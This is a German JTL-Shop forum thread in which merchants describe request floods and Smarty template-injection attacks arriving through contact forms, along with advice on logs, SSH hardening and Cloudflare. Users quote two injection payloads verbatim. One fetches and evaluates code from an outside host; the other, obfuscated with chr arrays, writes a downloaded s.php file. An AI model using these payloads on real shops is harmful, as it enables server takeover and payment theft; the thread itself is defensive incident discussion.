Neu Hackerangriff auf JTL Shop

TechNic

Gut bekanntes Mitglied
22. März 2019
156
11
Wir wurden auch angegriffen , aber anders: Uns bombt man zu mit Anfragen zu , Anfragen die so aussehen /?sf%5B%5D=572&sf%5B%5D=1175&sf%5B%5D= , Anragen von MICROSOFT , die 30-50x pro Sekunde kommen !!!!! Wir haben den Hoster jetzt gewechselt und ich habe erstmal eine andere Domain eingesetzt , bisher gehts gut.

Jetzt aber das Problem , ich habe auf der normalen .com jetzt den neusten JTL Shop eingerichtet , die Installation war fertig und ich hatte 35k Besucher im leeren Standardshop . Kann mir jemand sagen wie ich den Beschuss stoppe kann ??? Ich würde gerne wieder auf die Standard Domain wechseln !!!
 
Zuletzt bearbeitet:

Condorraptor

Sehr aktives Mitglied
18. September 2018
614
116
Berlin
Wir wurden auch angegriffen , aber anders: Uns bombt man zu mit Anfragen zu , Anfragen die so aussehen /?sf%5B%5D=572&sf%5B%5D=1175&sf%5B%5D= , Anragen von MICROSOFT , die 30-50x pro Sekunde kommen !!!!! Wir haben den Hoster jetzt gewechselt und ich habe erstmal eine andere Domain eingesetzt , bisher gehts gut.

Jetzt aber das Problem , ich habe auf der normalen .com jetzt den neusten JTL Shop eingerichtet , die Installation war fertig und ich hatte 35k Besucher im leeren Standardshop . Kann mir jemand sagen wie ich den Beschuss stoppe kann ??? Ich würde gerne wieder auf die Standard Domain wechseln !!!
Könntest über Cloudflare nachdenken
 

upbox

Offizieller Servicepartner
SPBanner
17. Januar 2011
272
37
Firma
upbox GmbH
Das kann gut helfen, sollte aber sinnvoll eingerichtet sein. Sonst sperrst du dir den Shopabgleich und diverse Zahlungsmodule eventuell gleich mit aus. Es ist also nicht einach nur ein Schalter den du umlegst und dann geht alles automatisch. Da sollte man sich schon ein bisschen damit beschäftigen.

Wenn es aber wirklich nur so Abfragen wie /?sf%5B%5D=572&sf%5B%5D=1175&sf%5B%5D= sind, kannst du den nicht global sperren weil sf auch auf der Suchergebnisseite genutzt wird. Wenn du das sperren willst, solltest du das nur machen wenn der User kein Session Cookie hat.
 

TechNic

Gut bekanntes Mitglied
22. März 2019
156
11
Moin ..... konnte gestern Abend erst mals gut schlafen ! Danke css für den tollen Job ! Da kann ich nur sagen ein Servicepartner so wie man Ihn sicht wünscht .... !!!!! Nicht lage reden - machen !!

Nochmals Danke für den tollen Job ! Jetzt wird pö-A-pö der Umzug gemach!

Thx Thomas
 
  • Ich liebe es
  • Gefällt mir
Reaktionen: ple und MichaelH

webgreat

Gut bekanntes Mitglied
17. April 2013
310
10
Verl
Moin, ich hatte heute nacht auch einen komischen Kontaktinhalt: Max {capture assign=u}https://oob.kinoavelon.com/v1/eval?d=rockerplates.de&t=boxinject{/capture}{eval var=$u|file_get_contents} , ist das bereits ein Hackerangriff? Mein Shop ist neuer: 5.7.2
Das sind XSS Aufrufe. Wenn die Lücke geschlossen ist, kann nichts passieren. Wenn. Das vorher schon kam, wirst du vermutlich eine Box im Backend finden die du nicht angelegt hast. Darin dann Schadhaftes JS. Gerne werden Zahlungen versucht umzuleiten im Checkout.
 

Micmac

Sehr aktives Mitglied
12. Februar 2016
337
60
Moin, ich hatte heute nacht auch einen komischen Kontaktinhalt: Max {capture assign=u}https://oob.kinoavelon.com/v1/eval?d=rockerplates.de&t=boxinject{/capture}{eval var=$u|file_get_contents} , ist das bereits ein Hackerangriff? Mein Shop ist neuer: 5.7.2
Wir hatten die selbe "Anfrage" über das Kontaktformular. Zur Sicherheit haben wir erstmal das Formular abgeschaltet und Leute, die sich damit auskennen, schauen sich das an.

Eine ähnliche Anfrag vom 28.06. hatten wir auch noch:
John {{file_put_contents(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[115,46,112,104,112])),file_get_contents(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[104,116,116,112,58,47,47,49,52,57,46,GEKÜRZT
 

webgreat

Gut bekanntes Mitglied
17. April 2013
310
10
Verl
Wir hatten die selbe "Anfrage" über das Kontaktformular. Zur Sicherheit haben wir erstmal das Formular abgeschaltet und Leute, die sich damit auskennen, schauen sich das an.

Eine ähnliche Anfrag vom 28.06. hatten wir auch noch:
Die Angriffe senden eigentlich erst eine Sonde. Wenn die positiv ist, kommen solche Anfragen wie du hast. Du solltest das untersuchen lassen. Für mich sieht das nach einen erfolgreichen XSS aus.
 

webgreat

Gut bekanntes Mitglied
17. April 2013
310
10
Verl
Die Angriffe senden eigentlich erst eine Sonde. Wenn die positiv ist, kommen solche Anfragen wie du hast. Du solltest das untersuchen lassen. Für mich sieht das nach einen erfolgreichen XSS aus.
Ich habe eben noch mal bei den andern Vorfällen geschaut. Ich würde sagen du bist infiziert. da wurde eine s.php Datei angelegt, die vermutlich schon wieder gelöscht wurde. Lass mal in den Logs nach der Datei suchen. Dann würde ich den Host vom Netz nehmen.
 

Micmac

Sehr aktives Mitglied
12. Februar 2016
337
60
Danke für die schnellen Antworten.
Der Hoster hat reagiert. Es scheint aber noch nichts abgeflossen zu sein,

"Eine Smarty Template Injection — SSTI im Smarty-Template-Engine
des JTL-Shops."

Die Mail ist kein einfacher Phishing-Versuch, sondern ein gezielter SSTI-Exploit (Server-
Side Template Injection) gegen den JTL- Shop. Der Angreifer nutzt die Smarty-
Template-Engine des Shops, um direkt vom Kontaktformular aus PHP-Code
auszuführen — ohne Admin-Zugang, ohne Upload-Schwachstelle, ohne
Authentifizierung.
Die vollständige Angriffskette ist rekonstruiert:
Code
Kontaktformular → SSTI → s.php → Datenharvesting → site.php → Vollzugriff
Der Einstiegspunkt war nicht s.php selbst — s.php wurde erst durch die SSTI in dieser
Mail erzeugt.

Ist es wirklich so einfach mit einer Zeile Code im Kontaktformular einzubrechen?
 

webgreat

Gut bekanntes Mitglied
17. April 2013
310
10
Verl
Danke für die schnellen Antworten.
Der Hoster hat reagiert. Es scheint aber noch nichts abgeflossen zu sein,

"Eine Smarty Template Injection — SSTI im Smarty-Template-Engine
des JTL-Shops."

Die Mail ist kein einfacher Phishing-Versuch, sondern ein gezielter SSTI-Exploit (Server-
Side Template Injection) gegen den JTL- Shop. Der Angreifer nutzt die Smarty-
Template-Engine des Shops, um direkt vom Kontaktformular aus PHP-Code
auszuführen — ohne Admin-Zugang, ohne Upload-Schwachstelle, ohne
Authentifizierung.
Die vollständige Angriffskette ist rekonstruiert:
Code
Kontaktformular → SSTI → s.php → Datenharvesting → site.php → Vollzugriff
Der Einstiegspunkt war nicht s.php selbst — s.php wurde erst durch die SSTI in dieser
Mail erzeugt.
Das nichts abgeflossen ist kann man so schnell i.d.R. nicht sagen. Kommt auf den Server an. Meist ist das SQL Loggin nicht aktiv. Wenn die per Curl die DB wo anders hin schicken, sieht man in den Logs nichts.
 

webgreat

Gut bekanntes Mitglied
17. April 2013
310
10
Verl
Das nichts abgeflossen ist kann man so schnell i.d.R. nicht sagen. Kommt auf den Server an. Meist ist das SQL Loggin nicht aktiv. Wenn die per Curl die DB wo anders hin schicken, sieht man in den Logs nichts.
Gerne werden auch SSH Keys ausgelesen oder auch neue Keys angelegt. Das sollte man in der Analyse beachten und SSH Port dicht machen oder auf eine IP beschränken.
 

arminma

Sehr aktives Mitglied
2. Januar 2017
213
108
Kurzes Update....das econ plugin findet keinerlei Schäden, auch die Zahlarten funktionieren und es sind keine neuen angelegt......wir hatten heute nachmittag noch normale orders...kann, um auf nummer sicher zu gehen econ helfen?
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Fehler Datenbank auf neuem Server mit Wawi 2.0.6 JTL-Wawi - Fehler und Bugs 3
Neu JTL-Wawi REST API (Beta): HTTP 402 "Zahlung erforderlich" auf allen Endpunkten trotz gebuchter Beta-Lizenz Schnittstellen Import / Export 2
Neu JTL Shop 5.7.2 NOVA - Akkordeon Überschriften herabstufen auf H3 Templates für JTL-Shop 3
Neu Conrad - Umstellung auf das One-Creditor-Modell Einrichtung und Installation von JTL-eazyAuction 0
Neu Update auf 1.11 / 2.0 nicht möglich Installation von JTL-Wawi 6
JTL reaktiviert keine Angebote mehr auf Otto Otto.de - Anbindung (SCX) 1
Neu Möglichkeit QR Code auf Label zu drucken JTL-ShippingLabels - Fehler und Bugs 2
Neu Probleme beim Shop Update auf 5.7.2 Installation / Updates von JTL-Shop 4
QR-Code auf der Rechnung gibt 100-fachen Betrag des eigentlichen Rechnungsbetrages aus JTL-Wawi 2.0 5
Seit dem Update meines JTL-Shops auf Version 5.7.1 funktioniert die Verbindung zwischen JTL-Wawi 2.0.4.0 und dem Shop nicht mehr. JTL-Wawi 2.0 6
Neu Dringend: USA DHL Versand Umstellung ab 24.07. auf HTSUS Zolltarifnummern JTL-ShippingLabels - Ideen, Lob und Kritik 7
Neu Update auf 5.7.2 - kein DB Update Installation / Updates von JTL-Shop 10
Neu Feld "Informationen" auf Smartphone immer ausklappen Allgemeine Fragen zu JTL-Shop 2
Neu Update von 1.8.12.4 auf 2.0.5 - Kostenfreie Version - Registrierung erforderlich? User helfen Usern - Fragen zu JTL-Wawi 1
JTL Update auf 1.9 , danach Import Kundenspezifrische Preise velerhaft JTL-Wawi 1.9 0
Neu Rechte-Fehler im J10n Modul und Auswirkung auf base.mo.php in div. Plugins (Shop 5.7.1) JTL-Shop - Fehler und Bugs 0
nach Update von 5.3 auf 5.7 neue Position im Warenkorb "Gebühr" die auch in den Auftrag übernommen werden Einrichtung JTL-Shop5 2
Beantwortet Shop Abgleich nach Update auf 5.7.2 nicht mehr möglich JTL-Shop - Fehler und Bugs 4
Neu Amazon: Artikel-Highlight / Produkttitel auf 75 Zeichen begrenzt Amazon-Anbindung - Fehler und Bugs 8
Neu Produktionsaufträge tauchen nicht in der Workbench auf JTL-Plan&Produce - Fehler und Bugs 2
Bei Update auf 2.05 kam folgende Meldung JTL-Wawi 2.0 2
Ameise - Importvorlage auf 80 Spalten begrenzt? JTL-Wawi 2.0 0
Login Wawi nicht möglich nach Update auf 1.11.11 JTL-Wawi 1.11 1
Neu Anpassung Kundendaten auf XRechnung User helfen Usern - Fragen zu JTL-Wawi 7
Neu Absenderadresse auf Versandlabel ändern User helfen Usern - Fragen zu JTL-Wawi 1
Ameise (1.11.11.0) Export auf Clients nicht möglich - Das Dezimaltrennzeichen kann nicht die leere Zeichenfolge sein JTL-Wawi 1.11 5
Neu Hinweis zum Auftrag wird seit Update auf die 1.11 nicht mehr angezeigt JTL-WMS / JTL-Packtisch+ - Fehler und Bugs 0
Neu Umstellung auf Jera Datev Schnittstelle - keine Kundennummer im Kundencenter Schnittstellen Import / Export 2
JTL APP - Fehlermeldung nach Update auf Wawi 1.11. JTL-Wawi App 6
JTL Wawi 1.11. - Fenstergröße - Artikel auf Einkaufsliste setzen JTL-Wawi 1.11 13
Nach Update auf 2.0.3 Keine Fehlermeldungen mehr sichtbar Otto.de - Anbindung (SCX) 3
DPD Cloud Labeldruck auf Zebra LP 2844-Z seit Update auf JTL-Wawi 1.11.x fehlerhaft JTL-Wawi 1.11 3
JTL nach Update auf 2.0.3 im Bereich „Kunden“ extrem langsam JTL-Wawi 2.0 2
Neu DotLiquide Variable Voraussichtliches Lieferdatum auf Rechnung User helfen Usern - Fragen zu JTL-Wawi 1
Neu Betrag auf der Rechnung nach Rechnungskorrektur User helfen Usern - Fragen zu JTL-Wawi 1
Fehler nach Update auf Version 1.11.11 und 2.0.4 JTL-Wawi 2.0 7
Lohnt sich das Update von 1.11.6 auf 2.0.4 aktuell? JTL-Wawi 2.0 3
Neu DHL Versenden 4.0 Zolltarifnummer auf 8 Stellen kürzen User helfen Usern - Fragen zu JTL-Wawi 1
Neu Internetmarke 2.0 - Direktdruck auf Umschlag JTL-ShippingLabels - Ideen, Lob und Kritik 3
Update auf 1.11.11 schlägt fehl JTL-Wawi 1.11 3
Neu Update Version 1.5 auf 1.11 - Download älterer Versionen als 1.8 Installation von JTL-Wawi 2
Neu Shop-Update auf 5.7.1: Sprachvariablen im Widerrufsformular werden nicht erkannt, obwohl vorhanden?! JTL-Shop - Fehler und Bugs 3
Erfahrungswerte Update von 1.8.12.2 auf 1.11.10 JTL-Wawi 1.11 4
Neu Umzug von sehr alter JTL Wawi Version auf neuen PC User helfen Usern - Fragen zu JTL-Wawi 3
Neu Rechnungskorrektur/Storno wird auf falsches Buchungskonto gebucht JTL-Wawi - Fehler und Bugs 1
Neu Umstellung auf DHL Versenden 4.0 leeres Versand Label JTL-ShippingLabels - Ideen, Lob und Kritik 5
Neu Angebotsname auf Amazon Amazon-Anbindung - Ideen, Lob und Kritik 0
Neu Konfigurationskomponenten auf Bons in separaten Positionen ausgeben JTL-POS - Fehler und Bugs 4
Neu Nach Update auf 1.11.10.0 Abgleich zu Ebay über 3 Stunden bei neuen Angeboten eBay-Anbindung - Fehler und Bugs 2
Beantwortet [WAWI-85758] Nach Update auf 1.11.10 klappt stornieren über ios Wawi App nicht mehr JTL-Workflows - Fehler und Bugs 1

Ähnliche Themen